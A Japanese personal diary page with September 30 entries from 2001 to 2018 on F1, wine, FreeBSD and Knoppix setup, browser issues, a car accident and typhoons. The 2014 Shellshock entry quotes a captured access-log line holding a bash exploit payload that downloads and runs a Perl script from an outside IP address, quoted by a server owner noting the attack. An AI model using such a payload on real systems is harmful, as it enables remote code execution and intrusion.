«前の日(09-29) 最新 次の日(10-01)» 追記 RSS with tsukkomi RSS without tsukkomi

実験的「実験的日記」


Sun, 30 Sep 2001 (平成13年) 寒い雨 edit

_ アメリカ GP

テロの影響で取り止めになるかもという話もあったが、開催されることになったようだ。

アメリカ GP とは関係ないけど、元 F1 ドライバーのアレッサンドロ・ザナルディがこの間のカートのレース(テロのあった週末)で両足切断の大事故にあったらしい。モータースポーツって相変わらず危険と隣合わせなんだと思った。

_ 文化祭

午後からは用事があるので午前中に行こうと思っていたのだけど、大寝坊したために行けなかった。残念。

_ 今日のヒトコマ

自転車に乗りながらカップラーメンを食べている少年を目撃。見たときはスープを飲んでいたのだけれど、麺はどうやって食べたのだろう。箸は持っていたので、食べたことは間違いないと思う。

_ Pook

またバージョンアップしています。

_ 今度は

Y クンがダウンしたらしい。さっき電話があって、彼のしていた仕事の一部を引き継ぐことになった。

さて、次は誰だ ?

_ 巨人 対 横浜

引退セレモニーのような 9 回表は何 ?

_ アメリカ GP

地上波の放送はないのか ?


Mon, 30 Sep 2002 (平成14年) edit

_ 本日のワイン

Le Cambon 2000 / Marcel Lapierre

フランス、ボージョレの赤ワインのはずなのですが、アルコール度数が 14.5% と異常に高いためか VDT 扱いです。防腐剤を全く添加しない完全有機農法を行っているのだそうです。友人宅での食事に持っていったら、「赤ワインだけど渋くないところがいい」とあれよあれよという間になくなりました。多分もっと時間をかけてじっくり飲んだ方が真価が理解できたのではないかという気が今はしています。美味しかったから、それで十分ですけど。

色はそんなに濃くなくて、まだまだ若いと感じさせるような明るい色調でした。香りはよく分かりませんでした。ユリが飾ってあったので、そっちの香りが強かったからですね。味は確かに渋味がほとんどなくて、するする飲めてしまいました。Marcel Lapierre のワインということで期待大でしたが、満足できました。この造り手のは他のも飲んでみたいです。

_ FreeBSD 入門

VMware にインストールしました。X の設定に失敗して、立往生しています。

本には XFree86-4.2.0 にはビデオカードのドライバとして vmware というのが用意されていると書いてあるのだけど、xf86cfg のドライバ一覧に出て来ないです。3.3.6 にして VMware-tool を入れればいいのかもしれないので、後日挑戦します。

_ 新マシン

届きました。i845G な機体は Linux でうまく動かせるのでしょうか。

_ FreeBSD 4.6.2-RELEASE on VMware

X を起動することができました。XFree86-4.2.0 のままで xf86cfg ではひとまず vga を選んでおいて、作成された /etc/X11/XF86Config の vga を vmware に書き換えれば OK でした。Depth は 15bit までのようです。

_ Nihongo ga

mada nyuryoku dekimasen.

_ 続・FreeBSD 4.6.2-RELEASE on VMware

今度は日本語を入力できるようにするための設定でつまづいています。今日はもう寝ます。

本日のツッコミ(全1件) [ツッコミを入れる]

_ ブチャ猫 [おしゃべりし、飲み、食べ、とにかくテンション高いんですよねぇ、女性群。]


Tue, 30 Sep 2003 (平成15年) edit

_ ネクタイ

テレビで水泳の祝賀会の模様を放送していましたが、北島のネクタイがとても気になりました。第一ボタンが見えるくらいノットを下げてました。締めるんならキチンと締めるほうがいいよ。

_ sf.net の ML

ボクも昨日 devel にメールを出したのですが、

This message was created automatically by mail delivery software.
A message that you sent has not yet been delivered to one or more of its
recipients after more than 2 hours on the queue on externalmx.vasoftware.com.
 
The message identifier is:     1A3dgo-0007Uy-M9
The date of the message is:    Mon, 29 Sep 2003 00:41:42 +0900
The subject of the message is: windex =?ISO-2022-JP?B?GyRCJCxGMCQtJF4kOyRzGyhC?=
 
The address to which the message has not yet been delivered is:
 
  tDiary-devel@lists.sourceforge.net
    Delay reason: SMTP error from remote mailer after RCPT TO:<tDiary-devel@lists.sourceforge.net>:
    host mail.sourceforge.net [66.35.250.206]: 451-host lookup did not complete
    451 Could not complete sender verify

というメイルが届いて、ML に配送されませんでした。使ったアドレスはプロバイダからもらっているものです。

_ 返金問題

ギフト券を送りますという返事をもらってから一週間経ちますが、まだ送られてきません。催促するほうがいいかな。

_ 怖い×怖い

職場からの帰り道、橋の上で渋滞にはまっていたら後ろの車のドライバーが変な動きをしているのに気づきました。手に何かを持って窓の外に向けています。何かと思ってルームミラー越しによく見てみると、信じられないことにビデオを撮っているようです。隣に座っている彼女に見て見てと見せたりしているので、ノロノロとはいえ動いているのに怖いことをしているな、追突されないかなとひやひやしながら渋滞を通り抜けました。

渋滞を抜けたら後ろの車は追い越し車線(一般道でこういう呼び方をするのか?)に車線変更して抜いていってくれたのでやれやれと一息ついたら、その直後にとんでもないことが起きました。ボクの車の前で走行車線を走っていた車(サニー)が右にウインカーを出したまま走っているので追い越し車線を走っていくカップルの車(マーチ)に気づいていなくて車線変更するんではないかと心配しながら見ていたら、信じられないことにその車は中央分離帯が切れたところで U ターンし始めました。急ブレーキをかけるマーチ。白く立ち上るタイヤスモークもむなしく、サニーの横っ腹にマーチがぶつかりました。

ボクが止まったらさらに事故を起こしかねないのでそのまま通り過ぎてしまったのですが、サニーを運転していたのが中年の女性だったのは分かりました。おばさんドライバー、恐るべし。あのカップル、二人ともシートベルとしてなかったみたいだから大丈夫だったのかがとても心配です。とても気の毒な出来事でした。


Thu, 30 Sep 2004 (平成16年) edit

_ あかいきつねとみどりのたぬき

誰しもが連想するのに「関係なし」とは驚きです。

_ 盛り上がってます

tDiary-users の掲示板。「初心者掲示板がほしい」なんて声が出てますけど、もう一つ作ったところで答える人は同じでしょうしね。そんなにあの掲示板は敷居が高いかな。


Fri, 30 Sep 2005 (平成17年) edit

_ Knoppix 3.8.1 で風博士 0.3.1

# vi /etc/apt/sources.list

69 行目、73 行目の行頭に # を挿入し、ファイルの最後に
 deb http://dl.gna.org/kazehakase debian/
という行を追加して、保存する

# apt-get update && apt-get install kazehakase

以上の手順で使用できました。途中の質問には既定の選択肢を選択すれば OK です。https な通信をするには上記に加えて apt-get install mozilla-psm を実行する必要があります。Knoppix 3.8.2 や 4.0 でどうかはそのうちやってみます。

_ 久しぶりの風博士

そんなわけで久しぶりに風博士を使ってます。最近 sid 機が不安定で風博士が落ちまくるので。というか、起動した瞬間に落ちます。何でかな。

追記: その件は承知してますので、mozila をバージョンアップした上で自前で風博士をコンパイルしてみましたが、起動した瞬間落ちるのです。他にも面倒なことが起きているので sid 自体をインストールしなおそうかと思ってます。

_ 99mph の球を投げた CHEWY!

この格好で 99mph を出すなんて、中の人はいったい誰 ?

_ 判決

世間のごく一部では注目されていた裁判の判決です。こちらも妥当な判決だと思います。というか、この件に関してはこれ以外はありえないと思いますが。

_ Office プログラムのセットアップのために新しいプロダクトキーを入手する方法

メモ。

プロダクトキーのラベルがない場合や汚損している場合に、Microsoft Office プログラムをセットアップするための新しいプロダクトキーを入手する方法について

本日のツッコミ(全1件) [ツッコミを入れる]

_ ゆきち [Mozillaが1.7.10ではないですか? あれは起動しないか、落ちるバージョンです。他に手元でコンパイルして、別..]


Sat, 30 Sep 2006 (平成18年) edit

_ レノボと IBM が ThinkPad 50 万台のバッテリーを回収

あとで確認。

追記: 該当しなかったので一安心。

_ デジタルカメラで撮影した画像に位置情報を付加する GPSPhotoLinker

GPX ファイルとデジタルカメラで撮影した JPEG ファイルをそれぞれ GPSPhotoLinker に読み込むと,撮影時刻と GPS トラックログの時刻情報から位置情報を計算して JPEG ファイルに位置情報を書き込みます。

Mac OS X 用フリーウェア。あとで試す。

_ デジカメプラグイン

Windows でやるならこれか。あとで試す。

_ PictureMap

これは、デジカメ写真、GPS データ、そして Google Maps API を利用して、地図アルバム(HTML)を作るためのツールです。

あとで試すかも。

_ 9 月 27 日(水)1:00〜13:30 に弊社サイトよりソフトウェアをダウンロードされた方へ

職場でこの期間に Vector からダウンロードした人がいないかチェックしないと。


Sun, 30 Sep 2007 (平成19年) edit

_ Rubyist Magazine 0021 号

あとで読む。3 周年おめでとうございます。

_ ワークステーション取付ツール

ボクも適正値を知っておく必要があると思われるのでメモ。


Tue, 30 Sep 2008 (平成20年) edit

_ 「F1 日本グランプリ」本当に大丈夫? 「バスの時間保証できない」に怒り

「いずれの無料バスについても、レース開始、あるいは最終列車出発までの到着を保証するものではありません」

この文言で訴訟だけは回避しようというつもりかな。

_ BIM シンポで証言!「50 代でも 3 次元 CAD は 2 週間でマスターできる」

マスターできてもソフトの価格の問題でちっちゃな企業がその流れについていくのは無理そうだと思った。AutoCAD LT ですら本数を用意するのに苦労してるというのに……


Wed, 30 Sep 2009 (平成21年) edit

_ IE7 を入れたら

事務所にはネットワークドライブに置いてあるアプリケイションがあったりするのだけど、その起動に大問題が発生した。警告が出るだけならまだしも、起動するためのツールが本体を呼び出せないというのだから手に負えない。自分が作ったものじゃないのでなおさら。IE のセキュリティ設定がそんなところに影響してくるとは知らないわけじゃなかったけどすっかり忘れてしまっていて、回避策を見つけるのにかなり手間取ってしまった。

[レベルのカスタマイズ] で「アプリケーションと安全でないファイルの起動」 を [有効] に変更すればいいのがわかったけれど、ブラウザの設定がそこまでいろんなところに影響するなら注意書きをわかりやすいところに置いておいてほしいな。



Fri, 30 Sep 2011 (平成23年) edit

_ 【解決】Firefox 7 への更新後にアドオンが消えてしまう

予想は正しくて、この現象で NoScript が無くなってしまっていた。

NoScript 消えた

そこでFirefox ヘルプの指示通り Add-on Recovery Tool をインストールしてみると restart するかとダイアログが出たので Firefox を再起動してみたら、ご覧の通り NoScript 復活。

NoScript 復活

ただ、いつも動作を意識するようなアドオンなら気づくけれども、そうでないものが消えてしまっているとこの問題があることに気づかないと思う。だから、Fx 7 へリリース日にアップデートしてしまった人はもれなくAdd-on Recovery Tool をインストールしておくほうがいいんじゃないかな。

_ Firefox 7.0.1 リリース

この最新版では、以下の変更が行われています。

Firefox の更新後、一部のユーザ環境でインストールされているいくつかのアドオンが消えてしまうという、まれな問題を修正しました。

まれな問題を引き当ててしまったのか。


Sun, 30 Sep 2012 (平成24年) edit

_ お出かけ二日目

台風の影響が出る前に家に帰り着けてホッとしてたら、直後に風雨が強まった。ギリギリだった模様。

_ 台風

予報では一日未明まで風雨が強いと言っていたけれども、日が変わるくらいにはもうほとんど雨は止んでて、風も強風が吹くのは思い出したように吹くだけになってた。明るくなってみないと明言はできないけれども、このあたりは大した被害もなさそうでよかった。

が、今回からは北海道に引っ越した妹のところが大丈夫かという心配処が増えてる。これまではうちが親戚では一番東だったから台風に関してはうちを過ぎてしまえば一安心という感覚だったのだけど。


Mon, 30 Sep 2013 (平成25年) edit

_ 慢性的な体力不足

週末の往復三時間強ドライブのお出かけで本日は完全にダメダメ状態。四十代になったばかりでこれだと今後一体どうなってしまうのかと本気で心配になってくるよ……


Tue, 30 Sep 2014 (平成26年) edit

_ Shellshock

影響範囲がとてつもなく膨大な脆弱性がまた見つかってしまうとは。自分の管理下のサーバはさっさと bash のパッケージをアップデートして安心、のはずなんだけど、web サーバのアクセスログを見ていたら

"GET /cgi-bin/hi HTTP/1.0" 404 372 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"

というログを見つけた。脆弱性のある環境だとここまでやりたい放題できちゃうの ?

それと、bash を使っていることがすぐにわかるものは対策できるけれど、ネットワーク機器などでも影響があるものが存在するはずなのでそういうものの情報にアンテナを張り巡らしておかないといけないのがこれまた面倒。



Fri, 30 Sep 2016 (平成28年) edit

_ 「ウイルスに感染した」警告画面にこの電話番号が表示されたら、それは偽もの

こういうのを見ると、パソコンやインターネットはシステム管理者のいない一般家庭に導入するのは今でも危険すぎるものなんじゃないかなと感じてしまう。

メーカーが「安全」な製品を出せばいいという人もあるかもしれないけれど、ソフトウェアや通信プロトコルが永久に安全なんてことはありえないから、安全な状態を維持していけるよう所有者がメンテナンスしていかないといけない状況は今後も変わらないだろう。そういうものだということを周知しないで「便利ですよ」とか「世の中の流れについていけなくなりますよ」とかいう売り文句で売っ売りっぱなしの売り手側にも問題はあると思ってもいるけど。

それはそれとして、記事に掲載されている画像を見ると「詳細については、フリーダイヤル …… に電話して云々」と書いてあるが、どう見てもフリーダイヤルには見えない番号だよね。


Sun, 30 Sep 2018 (平成30年) edit

_tDiary-5.0.10 リリース

普段から更新についていってるのでいつものようにバージョン番号が上がっただけ、かな。


«前の日(09-29) 最新 次の日(10-01)» 追記